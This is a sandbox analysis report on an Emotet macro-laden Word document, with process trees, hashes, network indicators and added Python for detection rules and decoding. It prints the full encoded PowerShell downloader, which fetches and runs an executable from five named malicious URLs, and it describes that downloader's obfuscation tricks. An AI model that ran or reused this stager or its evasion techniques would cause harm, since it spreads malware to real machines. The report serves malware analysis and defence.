File name: Requested invoice_L_8100.doc

Full analysis: https://app.any.run/tasks/af91f78d-1325-4df6-8307-6867e322b42f
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans in circulation. It started as a banking trojan and was upgraded over its lifetime into a modular loader that delivers other malware, which is what makes an infection so destructive. It mostly targets corporate victims, but private users are also infected through its mass spam email campaigns.

Analysis date: October 09, 2019, 14:32:13
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: microchip, Subject: Path, Author: Favian Hackett, Keywords: distributed, Comments: Borders, Template: Normal.dotm, Last Saved By: Stevie Hettinger, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Oct 8 14:50:00 2019, Last Saved Time/Date: Tue Oct 8 14:50:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5: F0A192D0F5FAA8B4439D4BC7CAD9FE39
SHA1: 39A23A3F4E0AEBC042640DD51134810AE0734AA0
SHA256: 7C99358A9100DF75F9BAB44700B907A5D04A1040814D15A221B0490AB5E55EB0
SSDEEP: 3072:qT+y1EVIKgdzSrGEKyIwLx3OLSLK7TwtGmN40GUJHEkSwKtyc3:qT+y1EVIKUzS3nLx3OIN40FK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided as is. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS
    • Application was dropped or rewritten from another process
      • 14.exe (PID: 2660)
      • 14.exe (PID: 2116)
      • msptermsizes.exe (PID: 2372)
      • msptermsizes.exe (PID: 3008)
    • Emotet process was detected
      • 14.exe (PID: 2660)
    • Downloads executable files from the Internet
      • powershell.exe (PID: 2732)
  • SUSPICIOUS
    • PowerShell script executed
      • powershell.exe (PID: 2732)
    • Creates files in the user directory
      • powershell.exe (PID: 2732)
    • Executed via WMI
      • powershell.exe (PID: 2732)
    • Executable content was dropped or overwritten
      • powershell.exe (PID: 2732)
      • 14.exe (PID: 2660)
    • Starts itself from another location
      • 14.exe (PID: 2660)
  • INFO
    • Creates files in the user directory
      • WINWORD.EXE (PID: 2928)
    • Reads Microsoft Office registry keys
      • WINWORD.EXE (PID: 2928)
Signature artifacts and their mapping to the MITRE ATT&CK™ matrix are listed in the full report.
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
Manager: Cummerata
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 201
Paragraphs: 1
Lines: 1
Company: Bayer LLC
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 172
Words: 30
Pages: 1
ModifyDate: 2019:10:08 13:50:00
CreateDate: 2019:10:08 13:50:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: Stevie Hettinger
Template: Normal.dotm
Comments: Borders
Keywords: distributed
Author: Favian Hackett
Subject: Path
Title: microchip
All screenshots are available in the full report
Total processes: 41
Monitored processes: 6
Malicious processes: 3
Suspicious processes: 0

Behavior graph

winword.exe (PID 2928, no specs)
  └─ start (via WMI; the recorded parent of the child is wmiprvse.exe) → powershell.exe (PID 2732)
       └─ drop and start → 14.exe (PID 2116, no specs)
            └─ re-executes itself → 14.exe --b731438d (PID 2660) #EMOTET
                 └─ drop and start → msptermsizes.exe (PID 2372, no specs)
                      └─ re-executes itself → msptermsizes.exe --f91b2738 (PID 3008, no specs)
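The indicators and the process chain above fit together: the macro launches PowerShell through WMI (so wmiprvse.exe, not WINWORD.EXE, is the recorded parent), PowerShell drops 14.exe into the root of the user profile, and the payload re-launches itself, and later its %LOCALAPPDATA% copy, with a single 8-hex-digit argument. As an added example that is not part of the ANY.RUN report, the Python below turns those observations into process-creation rules and runs them over records transcribed from the report's process table (the PowerShell command line is shortened in the records because only its flag matters here). The rule names are my own, and the parent is matched by image name because that is all the report gives.

```python
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    parent_image: str   # the report records the parent's image name, not its PID
    image: str          # full path of the started executable
    cmdline: str


# Process-creation records transcribed from the report's process table.
# The -enco argument is truncated here on purpose; its content is irrelevant
# to these rules.
EVENTS = [
    ProcessEvent(2928, "explorer.exe",
                 r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
                 r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
                 r'"C:\Users\admin\Desktop\Requested invoice_L_8100.doc"'),
    ProcessEvent(2732, "wmiprvse.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3..."),
    ProcessEvent(2116, "powershell.exe", r"C:\Users\admin\14.exe",
                 r'"C:\Users\admin\14.exe"'),
    ProcessEvent(2660, "14.exe", r"C:\Users\admin\14.exe", "--b731438d"),
    ProcessEvent(2372, "14.exe",
                 r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe",
                 r'"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"'),
    ProcessEvent(3008, "msptermsizes.exe",
                 r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe",
                 "--f91b2738"),
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (and the
# alias -ec), which is why "-enco" slips past rules that look only for "-enc"
# or the full parameter name.
ENCODED_FLAGS = {"-ec"} | {"-" + "encodedcommand"[:n] for n in range(1, 15)}


def has_encoded_command(cmdline):
    return any(tok.lower() in ENCODED_FLAGS for tok in cmdline.split())


def user_profile_root_exe(path):
    # C:\Users\<user>\<name>.exe, i.e. directly in the profile, not a subfolder
    return re.fullmatch(r"(?i)c:\\users\\[^\\]+\\[^\\]+\.exe", path) is not None


def evaluate(ev):
    """Return the names of the behavioural rules this event triggers."""
    hits = []
    image_name = ntpath.basename(ev.image).lower()
    parent = ev.parent_image.lower()
    # WMI (Win32_Process.Create from a macro) makes wmiprvse.exe the parent,
    # so an Office-spawns-PowerShell rule never fires on this chain.
    if (image_name == "powershell.exe" and parent == "wmiprvse.exe"
            and has_encoded_command(ev.cmdline)):
        hits.append("wmi_spawned_encoded_powershell")
    # payload written by PowerShell into the profile root and executed from there
    if parent == "powershell.exe" and user_profile_root_exe(ev.image):
        hits.append("powershell_dropped_exe_in_profile_root")
    # the binary re-launching its own image with a lone --<8 hex digits> argument
    if image_name == parent and re.fullmatch(r"--[0-9a-f]{8}", ev.cmdline.strip()):
        hits.append("self_relaunch_with_hex_argument")
    # a copy under %LOCALAPPDATA%\<dir>\<dir>.exe started by a differently named parent
    m = re.fullmatch(r"(?i)c:\\users\\[^\\]+\\appdata\\local\\([^\\]+)\\([^\\]+)\.exe",
                     ev.image)
    if m and m.group(1).lower() == m.group(2).lower() and parent != image_name:
        hits.append("localappdata_copy_named_after_folder")
    return hits


def scan(events):
    """Map each PID to the rules it triggered."""
    return {ev.pid: evaluate(ev) for ev in events}


if __name__ == "__main__":
    for pid, hits in scan(EVENTS).items():
        print(pid, hits or "-")
```

Every process except WINWORD.EXE itself triggers at least one rule, and the chain is recognisable without any signature for the payload: the encoded-flag prefix check, the profile-root drop and the self-relaunch pattern are all visible in process-creation telemetry alone.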

Process information

PID 2928
  CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Requested invoice_L_8100.doc"
  Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
  Parent process: explorer.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Microsoft Word
  Version: 14.0.6024.1000

PID 2732
  CMD: powershell -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAAOAAwADkAOQBjADgANgAwADYAPQAnAGMANwB4ADMAMAA0ADAAMAA2ADQANwAzACcAOwAkAGIAOQA3ADYAMAAwADgANQAwAGMAeAAgAD0AIAAnADEANAAnADsAJABjADAAMQAxAHgAYwAyAGMAOQAzADAAMwAwAD0AJwBjAHgANgAxADAAeAA0ADUAMQA4ADgANAA3ACcAOwAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADkANwA2ADAAMAA4ADUAMABjAHgAKwAnAC4AZQB4AGUAJwA7ACQAYgA5ADkAMwAwADAAOAAzADAANQA4AD0AJwBjADAAeAB4AGMAOAA2ADYAMAAwAGMAJwA7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBiAGMATABJAEUAbgBUADsAJAB4AGIAMAA5ADcANQA4ADAAYgAxADAAPQAnAGgAdAB0AHAAOgAvAC8AaABvAG0AZQB0AG8AdwBuAGYAbABvAG8AcgBpAG4AZwB3AGYALgBjAG8AbQAvAGIAaQByAHQAaABkAGEAeQBfAHAAbwBwAHUAcAAvADEANABzAG0AMgBlAHUAaABhAC0AOQB5AG4AbgBkADcALQAwADcAOQAxAC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAG8AcABpAGUAcgBtAGEAdABpAGMAYQAuAGMAbwBtAC8AcwBvAHgANgAyAGMALwBaAFQARwBaAGgARgAvAEAAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAbgBoAGoAZQBuAGQAYQAuAG4AZQB0AC8AcgBvAGMAdwA4AGgAeQAvAGEAZAB4AGEANQAxAC0ANQBsADUAMABsADcAdABmAGwALQA5ADIAMwAvAEAAaAB0AHQAcAA6AC8ALwBsAGEAcABhAGsAbQBhAG4AaQBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASwBuAGoAdABaAGoALwBAAGgAdAB0AHAAOgAvAC8AbQBhAGkAcwB2AGkAcwBpAHQAYQBkAG8AcwAuAGMAbwBtAC4AYgByAC8AcABlAGQAaQBkAG8ALQBvAG4AbABpAG4AZQAvAGEAcgBtAC0AcABuADgALQA5ADAALwAnAC4AIgBTAHAAYABMAGkAVAAiACgAJwBAACcAKQA7ACQAeAAwADcAMwA5ADgAOAA3ADAAMgA4ADYAPQAnAHgAOAA3ADAAYwA4AGIANgAyADcAOAAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAA4ADQANwA4ADUAMAAwADAAYwBjADAAMAAgAGkAbgAgACQAeABiADAAOQA3ADUAOAAwAGIAMQAwACkAewB0AHIAeQB7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AC4AIgBkAG8AYABXAG4ATABPAGAAQQBkAGYAYABpAEwAZQAiACgAJAB4ADgANAA3ADgANQAwADAAMABjAGMAMAAwACwAIAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAkAGMANgAwADAANwA3ADUANQA4ADAANwA5ADAAPQAnAHgAOAA0ADYANAA2ADMAMABjADAAMABjADEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJAB4ADcANAAyADcAMwA0AGIAMwAxADkAeAApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA1ADMAMwAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABgAEEAcgBUACIAKAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAkAGMANQAwADgAYgB4ADMAYgAwADIAOAA3ADAAPQAnAHgAMAA0ADMANwAxAGIAMAAzADgAOAAnADsAYgByAGUAYQBrADsAJABiADUAMQA5ADAAMAAwADIAMQBiADcAYwAzAD0AJwB4ADAAOQAwAGIAMAAwADIAMAA0AGMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABiAHgANQAzADQANQA2AHgAMAA4AGMAYwA9ACcAYwAwADEAMQAwADYAMAA0ADAAOQA2AHgAMAAnAA==
  Decoded script summary (the argument is base64 of the script as UTF-16LE text): creates a System.Net.WebClient, splits a single string on '@' into five download URLs (hometownflooringwf.com, www.copiermatica.com, www.anhjenda.net, lapakmanis.com, maisvisitados.com.br), tries each with DownloadFile into %USERPROFILE%\14.exe inside a try/catch, and as soon as the saved file is at least 35330 bytes long starts it with [Diagnostics.Process]::Start and breaks out of the loop. Cmdlet and method names are split with '+' and backticks ('n'+'ew-obj'+'ect', "do`WnLO`Adf`iLe", "Sp`LiT") to defeat naive string matching; the script opens with a decoy comment containing a microsoft.com URL.
  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Parent process: wmiprvse.exe
  User: admin
  Company: Microsoft Corporation
  Integrity Level: MEDIUM
  Description: Windows PowerShell
  Exit code: 0
  Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID 2116
  CMD: "C:\Users\admin\14.exe"
  Path: C:\Users\admin\14.exe
  Parent process: powershell.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 2660
  CMD: --b731438d
  Path: C:\Users\admin\14.exe
  Parent process: 14.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 2372
  CMD: "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"
  Path: C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
  Parent process: 14.exe
  User: admin
  Integrity Level: MEDIUM
  Exit code: 0

PID 3008
  CMD: --f91b2738
  Path: C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe
  Parent process: msptermsizes.exe
  User: admin
  Integrity Level: MEDIUM
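The -enco switch of PID 2732 is an unambiguous prefix of -EncodedCommand, and its value is base64 of the script as UTF-16LE text. As an added example that is not part of the ANY.RUN report, the Python below decodes that exact command line, undoes the backtick and string-concatenation obfuscation, and extracts the download URLs, the drop path and the size gate as IOCs. The regular expressions are written against this sample's layout (single-quoted assignments, one '@'-joined URL string, a drop path built as $env:userprofile+'\'+$var+'.exe') and are an assumption about this family's downloader, not a general PowerShell evaluator.

```python
import base64
import json
import re

# Encoded command line of PID 2732, copied from the report and joined across the
# line break introduced by page extraction (the page's own data, not constructed).
ENCODED_COMMAND = (
    "PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAAOAAwADkAOQBjADgANgAwADYAPQAnAGMANwB4ADMAMAA0ADAAMAA2ADQANwAzACcAOwAk"
    "AGIAOQA3ADYAMAAwADgANQAwAGMAeAAgAD0AIAAnADEANAAnADsAJABjADAAMQAxAHgAYwAyAGMAOQAzADAAMwAwAD0AJwBjAHgANgAxADAAeAA0ADUAMQA4ADgANAA3ACcAOwAk"
    "AHgANwA0ADIANwAzADQAYgAzADEAOQB4AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABiADkANwA2ADAAMAA4ADUAMABjAHgAKwAnAC4AZQB4AGUAJwA7ACQA"
    "YgA5ADkAMwAwADAAOAAzADAANQA4AD0AJwBjADAAeAB4AGMAOAA2ADYAMAAwAGMAJwA7ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAGUAVAAuAFcARQBiAGMATABJAEUAbgBUADsA"
    "JAB4AGIAMAA5ADcANQA4ADAAYgAxADAAPQAnAGgAdAB0AHAAOgAvAC8AaABvAG0AZQB0AG8AdwBuAGYAbABvAG8AcgBpAG4AZwB3AGYALgBjAG8AbQAvAGIAaQByAHQAaABkAGEAeQBfAHAAbwBwAHUAcAAvADEANABzAG0AMgBlAHUAaABhAC0AOQB5AG4AbgBkADcALQAwADcAOQAxAC8A"
    "QABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAG8AcABpAGUAcgBtAGEAdABpAGMAYQAuAGMAbwBtAC8AcwBvAHgANgAyAGMALwBaAFQARwBaAGgARgAvAEAA"
    "aAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAbgBoAGoAZQBuAGQAYQAuAG4AZQB0AC8AcgBvAGMAdwA4AGgAeQAvAGEAZAB4AGEANQAxAC0ANQBsADUAMABsADcAdABmAGwALQA5ADIAMwAvAEAA"
    "aAB0AHQAcAA6AC8ALwBsAGEAcABhAGsAbQBhAG4AaQBzAC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8ASwBuAGoAdABaAGoALwBAAGgAdAB0AHAAOgAvAC8AbQBhAGkAcwB2AGkAcwBpAHQAYQBkAG8AcwAuAGMAbwBtAC4AYgByAC8AcABlAGQAaQBkAG8ALQBvAG4AbABpAG4AZQAvAGEAcgBtAC0AcABuADgALQA5ADAALwAnAC4AIgBTAHAAYABMAGkAVAAiACgAJwBAACcAKQA7"
    "ACQAeAAwADcAMwA5ADgAOAA3ADAAMgA4ADYAPQAnAHgAOAA3ADAAYwA4AGIANgAyADcAOAAnADsAZgBvAHIAZQBhAGMAaAAoACQAeAA4ADQANwA4ADUAMAAwADAAYwBjADAAMAAgAGkAbgAgACQAeABiADAAOQA3ADUAOAAwAGIAMQAwACkAewB0AHIAeQB7"
    "ACQAYgAwADMAYwAwAGIAMwAwADQAMAA1AC4AIgBkAG8AYABXAG4ATABPAGAAQQBkAGYAYABpAEwAZQAiACgAJAB4ADgANAA3ADgANQAwADAAMABjAGMAMAAwACwAIAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAk"
    "AGMANgAwADAANwA3ADUANQA4ADAANwA5ADAAPQAnAHgAOAA0ADYANAA2ADMAMABjADAAMABjADEAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJAB4ADcANAAyADcAMwA0AGIAMwAxADkAeAApAC4AIgBMAEUAYAB"
    "OAGAAZwBUAGgAIgAgAC0AZwBlACAAMwA1ADMAMwAwACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABgAEEAcgBUACIAKAAkAHgANwA0ADIANwAzADQAYgAzADEAOQB4ACkAOwAk"
    "AGMANQAwADgAYgB4ADMAYgAwADIAOAA3ADAAPQAnAHgAMAA0ADMANwAxAGIAMAAzADgAOAAnADsAYgByAGUAYQBrADsAJABiADUAMQA5ADAAMAAwADIAMQBiADcAYwAzAD0AJwB4ADAAOQAwAGIAMAAwADIAMAA0AGMAMAAnAH0AfQBjAGEAdABjAGgAewB9AH0A"
    "JABiAHgANQAzADQANQA2AHgAMAA4AGMAYwA9ACcAYwAwADEAMQAwADYAMAA0ADAAOQA2AHgAMAAnAA=="
)

# Lowercase letters that PowerShell treats as real escapes after a backtick.
# A backtick before any other letter is simply dropped by the parser, which is
# why "do`WnLO`Adf`iLe" still resolves to DownloadFile at run time.
PS_ESCAPE_LETTERS = set("0abefnrtuv")


def decode_encoded_command(b64):
    """-EncodedCommand (any unambiguous prefix, here -enco) carries base64 of
    the script as UTF-16LE text."""
    raw = base64.b64decode("".join(b64.split()))
    return raw.decode("utf-16-le")


def deobfuscate(script):
    """Undo the two cheap tricks used here: backtick-splitting of member names
    and string concatenation of cmdlet names ('n'+'ew-obj'+'ect')."""
    script = re.sub(
        r"`([A-Za-z])",
        lambda m: m.group(0) if m.group(1) in PS_ESCAPE_LETTERS else m.group(1),
        script,
    )
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    while True:
        merged = concat.sub(r"'\1\2'", script)
        if merged == script:
            return script
        script = merged


def extract_iocs(b64):
    """Pull the network and host IOCs a responder wants from this downloader."""
    script = deobfuscate(decode_encoded_command(b64))
    # plain string assignments such as $b97600850cx = '14'
    literals = dict(re.findall(r"\$(\w+)\s*=\s*'([^']*)'", script))
    # the URL list is one quoted string the script later splits on '@'
    urls = []
    for value in literals.values():
        urls += [u for u in value.split("@") if re.match(r"https?://", u)]
    # drop path built as $env:userprofile+'\'+$var+'.exe' (assumed layout,
    # specific to this sample; not a general expression evaluator)
    drop_path = None
    m = re.search(r"\$env:userprofile\+'\\'\+\$(\w+)\+'\.exe'", script, re.I)
    if m and m.group(1) in literals:
        drop_path = "%USERPROFILE%\\" + literals[m.group(1)] + ".exe"
    # size gate before execution: (Get-Item <path>).Length -ge N
    m = re.search(r"\.\"?length\"?\s+-ge\s+(\d+)", script, re.I)
    min_size = int(m.group(1)) if m else None
    lowered = script.lower()
    return {
        "urls": urls,
        "drop_path": drop_path,
        "min_size": min_size,
        "uses_webclient_downloadfile": "net.webclient" in lowered and "downloadfile" in lowered,
        "starts_payload": re.search(r'process\]::"?start"?\(', lowered) is not None,
    }


if __name__ == "__main__":
    print(json.dumps(extract_iocs(ENCODED_COMMAND), indent=2))
```

Run it directly to print the IOC set as JSON. The recovered URL list contains the one address the sandbox actually fetched (the single HTTP request in the network section below) together with the four fallbacks the sample never needed to contact, which is why blocking on observed traffic alone under-reports the infrastructure in a maldoc like this.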
Total events: 1 663
Read events: 1 444
Write events: 0
Delete events: 0
Modification events: no data

Executable files: 2
Suspicious files: 2
Text files: 2
Unknown types: 17

Dropped files

PID 2928, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\CVR4DA0.tmp.cvr
  MD5: not reported
  SHA256: not reported
PID 2732, powershell.exe: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HKU097U23ER9RMBHL3LF.temp
  MD5: not reported
  SHA256: not reported
PID 2928, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm (type: pgc)
  MD5: CB0890A34CBD6E1BE368D4CBC9212F34
  SHA256: 2913ED40B1A05DF7601B950AD1775A6BF15ABDA50CC4217E265085D78674A255
PID 2928, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CB582E03.wmf (type: wmf)
  MD5: B8494D6E2E4DB567A725CA9363781E77
  SHA256: 7A0E8070CFE40A63932BC9191EC7C3E8B2F5C3E5B79AC84A14D5A882CA89DCAA
PID 2928, WINWORD.EXE: C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd (type: tlb)
  MD5: E109A488BC9A812D264818B379F9737C
  SHA256: 2D15B5790436C9DDCFA625D9D5A80CCD1AEB473D1628CD75B8F80662E867B3E0
PID 2928, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat (type: text)
  MD5: 37B026D0B988DCA6B6604AD23801B943
  SHA256: E718A2DFDA4EB4919B724031B3201A10AA8B5CB726DF57A70056CEBCEE147A9A
PID 2928, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5F7C91FF.wmf (type: wmf)
  MD5: 3C42744A300846ADA2FF73700045443D
  SHA256: B528F10328D412295BA0407DFF1391E48AF61CA90B889CC5DAD9634C35BFBB90
PID 2928, WINWORD.EXE: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Requested invoice_L_8100.doc.LNK (type: lnk)
  MD5: 212F3DC323A5DC8783165818D66B6506
  SHA256: AC8955F5A98F1A3E706487E3EF64126EB24193E10E406B3D10C6DE35DC7AE101
PID 2928, WINWORD.EXE: C:\Users\admin\Desktop\~$quested invoice_L_8100.doc (type: pgc)
  MD5: 088C8C30118AD4B21BBC1F11F80BD9EF
  SHA256: 6C4EFE4D4657790428310E6B1FBA7D7E5FAECFD26C7991DF8067A1DB04D7423D
PID 2928, WINWORD.EXE: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4BA876.wmf (type: wmf)
  MD5: 276491F4C73C63BB8D84001E782AC996
  SHA256: 22CA0E530DE62AAE7EDB15A8F92BF974620B1F9BECD6B088A3F51BFF23280F4C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 1
TCP/UDP connections: 1
DNS requests: 1
Threats: 0

HTTP requests

PID 2732, powershell.exe
  Method: GET
  HTTP code: 200
  IP: 166.62.112.199:80
  URL: http://hometownflooringwf.com/birthday_popup/14sm2euha-9ynnd7-0791/
  CN: US
  Type: executable
  Size: 136 Kb
  Reputation: malicious

Connections

PID 2732, powershell.exe
  IP: 166.62.112.199:80
  Domain: hometownflooringwf.com
  ASN: GoDaddy.com, LLC
  CN: US
  Reputation: malicious

DNS requests

hometownflooringwf.com
  IP: 166.62.112.199
  Reputation: malicious

Threats (IDS rule hits)

PID 2732, powershell.exe
  Class: Potential Corporate Privacy Violation
  Message: ET POLICY PE EXE or DLL Windows file download HTTP
PID 2732, powershell.exe
  Class: Potentially Bad Traffic
  Message: ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
PID 2732, powershell.exe
  Class: Misc activity
  Message: ET INFO EXE - Served Attached HTTP
No debug info